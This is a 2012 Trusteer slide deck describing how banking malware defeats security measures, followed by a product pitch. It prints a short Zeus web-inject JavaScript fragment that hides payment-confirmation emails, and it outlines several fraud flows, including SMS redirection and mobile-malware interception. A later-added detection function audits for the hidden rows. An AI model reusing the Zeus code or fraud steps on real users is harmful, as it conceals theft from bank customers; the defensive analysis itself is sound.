No Silver Bullet
How Malware Defeats Security Measures
and What You Can Do About it
Ziv Cohen – Director, EMEA
April 2012
© 2012 Trusteer Confidential
Malware Attacks Are on the Rise
- Malware incidents increased more than 30% between 2008 and 2011, causing significant damage
- 54 million U.S. adults said they had incidents of malware on their desktops in 2011
Research - Use a Layered Security Approach to Combat Phishing and Malware-Based Attacks
Published: 26 March 2012
Online Banking Fraud is Happening
Online Banking Fraud Losses Estimated at 1B$ in US and Europe
New Online Banking Services Adoption Hindered by Security Concerns
What are the main reasons you have decided not to use mobile banking?
- My banking needs are being met without mobile banking: 57%
- I’m concerned about the security of mobile banking: 48%
- I don't trust the technology to properly process my banking transaction: 22%
- The cost of data access on my wireless plan is too high: 18%
- It is too difficult to see on my mobile phone’s screen: 17%
- Other: 13%
- It’s difficult or time consuming to set up mobile banking: 10%
- I don’t have a banking account with which to use mobile banking: 9%
- It is not offered by my bank or credit union: 3%
- My bank charges a fee for using mobile banking: 2%
- Refuse to answer: 1%
Federal Survey - Consumers and Mobile Financial Services March 2012
The Cost of Advanced Malware Attack
- 40% of CIOs report malware related internal breaches (2010 Deloitte-NASCIO Cyber Security Study)
- 49% of data breaches incorporated malware (Verizon 2010 Data Breach Report)
- Almost 760 companies attacked with the same resources as RSA. 20% of the Fortune 100 are on this list. (Krebsonsecurity.com, “Who else was hit by RSA Attackers?”)
The end point is the weak link
[Diagram labels: Cyber Criminals; End Point User; Sensitive Data and Apps; paths marked Easy, Easy and Difficult]
Anatomy of Malware attack
[Diagram. Stage labels: User Target; Malware Infection; Attack Launch; Execute Fraud / Information Theft. Annotations: Phishing, Drive-by-Download; System exploit, Malicious Code install; Credentials theft, Web injection, Social engineering; Human and Automated]
Attack Setup, Execute Fraud: Man-in-the-Browser, Web Injection
[Screenshot: login form with Login and Password fields; callouts: PII Theft, Credentials Theft, Social Engineering]
Keeping Banks In the Dark - Change Phone
1. User: Access site
2. Malware: Update user’s phone number (1800TrueNum changed to 1800ToFraud)
3. Bank: Sends a confirmation SMS to previous phone, with code and new phone number ("Confirmation Code: 1234 For number 1800ToFraud")
4. Malware: Inform user that the bank has issued a FREE SIM CARD for security reasons, user enters code to accept offer
5. Fraudster: Enters confirmation code and redirects all future bank SMS/Calls to 1800ToFraud
Confirmation Emails - Hidden
1. Malware Transfer Money
2. Bank Sends Confirmation Email
3. Malware Hide Confirmation Email
[Figure: mock inbox with columns From, Subject, Sent. The bank's "Transaction Confirmation - Money Transfer" message appears among personal mail ("Party Saturday Night", "Promotion", "Love You"), all sent Tue 13 Dec 2011 between 12:00 and 12:03]
Zeus code for hiding emails
    if( document.getElementById("datatable").rows[i].innerHTML.indexOf("Faster Payment Confirmation") != -1 ||
        document.getElementById("datatable").rows[i].innerHTML.indexOf("Payment Created") )
    { //Faster Payment Confirmation | Payment Created
        document.getElementById("datatable").rows[i].style.display = "none";
    }
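A defender-side counterpart to the hiding snippet above, added here as an example and not part of the original slides: it flags confirmation rows that are hidden in, or missing from, the message table. The subject list, the row shape, `expectedCount` and the function names are assumptions.

```javascript
// Added example (not from the slides). Row shape, subject list and function
// names are assumptions; the sample rows at the bottom are constructed.
const CONFIRMATION_SUBJECTS = ["Faster Payment Confirmation", "Payment Created"];

// Default reads the inline style that the hiding snippet sets. In a browser,
// pass row => getComputedStyle(row).display to also catch stylesheet hiding.
const inlineDisplay = (row) => (row.style && row.style.display) || "";

function isConfirmation(row) {
  return CONFIRMATION_SUBJECTS.some((s) => row.innerHTML.indexOf(s) !== -1);
}

// expectedCount: number of confirmation messages the server rendered into the
// page (assumed to be known to the caller, e.g. from the server response).
function auditMessageTable(rows, expectedCount, getDisplay = inlineDisplay) {
  const hidden = [];
  let visible = 0;
  Array.from(rows).forEach((row, i) => {
    if (!isConfirmation(row)) return;
    if (getDisplay(row) === "none") hidden.push(i);
    else visible += 1;
  });
  // Rows deleted from the DOM instead of hidden show up as a shortfall.
  const removed = Math.max(0, expectedCount - visible - hidden.length);
  return { hidden, removed, tampered: hidden.length > 0 || removed > 0 };
}

// Constructed sample: row 1 is hidden the way the slide's snippet hides it,
// and a second confirmation the server sent is absent from the table.
const sampleRows = [
  { innerHTML: "<td>Friend</td><td>Party Saturday Night</td>", style: { display: "" } },
  { innerHTML: "<td>Bank</td><td>Faster Payment Confirmation</td>", style: { display: "none" } },
  { innerHTML: "<td>Boss</td><td>Promotion</td>", style: { display: "" } },
];
console.log(auditMessageTable(sampleRows, 2));
```

Because man-in-the-browser code runs in the same page as this check, the result is best reported to the server as one risk signal alongside out-of-band transaction confirmation.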
Keeping Banks In the Dark - DDoS
FBI warning about Banking Trojan “GAMEOVER”
“After the accounts are compromised, the perpetrators conduct a Distributed Denial of Service (DDoS) attack on the financial institution”
Facebook/Ukash – Cross Channel Attack
To confirm verification you have to enter 20 euro UKash voucher. Ukash vouchers are sold by UKash.com website and Ukash.com is not affiliated with Facebook company. 20 euro will be added to your Facebook main account balance. This verification is used to confirm your age and country of origin. The UKash Voucher consists of 19 numbers and face value (sum), begins on “633”. For example 6337757575757
MITMO/ZITMO
[Diagram actors: User, Legitimate Website, Malware Command & Control]
1. User Accesses Site
2. “Please provide your mobile phone number”
3. SMS with link to Mobile malware (“install new certificate”)
4. Download Malware
5. Malware transfers funds (PC is proxy)
6. Transaction Approval SMS
7. Malware forwards approval SMS
8. Transaction approved using stolen SMS
FFIEC Recognizes Malware as the Root Cause of Most Cybercrime Activities
“Controls implemented in conformance with the Guidance several years ago have become less effective..”
“Malware can compromise some of the most robust online authentication techniques”
The Challenge: No Silver Bullet
Security measure -> bypassed by (x = Bypassed)
- Device Identification, Challenge Questions -> Malware
- OTP Devices -> Man in the Browser, Real Time Phishing
- Transaction Verification -> Man in the Mobile
- Transaction Signing -> Social Engineering Malware
- Virtual Browser on Stick -> Memory Injection Malware
- Clickstream Detection -> Malware adopts Human-like behavior
Intelligent, Adaptive, Automated
[Diagram labels: Threat Intelligence; Adaptive Protection; Sustainable Cybercrime Prevention]
Crime Logic vs. Files and Signatures
- Trusteer: What it does? Crime Logic (100s): Exploit, Infect, Hook, Inject, Access, Theft
- Legacy (Anti-Virus): What it is? Files and Signatures (1000000s)
First to Discover New Forms of Malware
[Diagram: Tens of Millions of Endpoints; Endpoints Detect and stop Crime Logic. Malware named: OddJob, Shylock, Sunspot, Torpig v2, SpitMo for Android, Ramnit goes financial]
Ready, Before the Threat Reaches You
[Diagram: Tens of Millions of Endpoints; Endpoints Detect and stop Crime Logic. Malware named: OddJob, Shylock, Sunspot, Torpig v2, SpitMo for Android, Ramnit goes financial]
Process, People, Products
[Diagram labels: Cybercrime Intelligence; Fraud Alert; Crime Logic; Analytics & Management; Corp Crime Logic; Unknown crime logic; Risk Assessment; Trusteer Intelligence Center; Adaptive Protection; Known crime logic; Online Threats]
Trusteer Cybercrime Prevention Architecture:
Industry leading solution for Online Cybercrime Activities
- Intelligence-based risk assessment
- Multi-layer protection against malware
- No malware = Transaction anomaly prevention
Products:
- Trusteer Pinpoint for Malware Detection: Detect malware-infected users, devices
- Trusteer Pinpoint for Phishing Detection: Detect and Stop real-time phishing
- Trusteer Rapport for PC/Mac: Stop and remove financial malware, phishing
- Trusteer Rapport for Mobile: Protect against mobile malware, high risk devices
Less Cost, Less Complexity
Thank You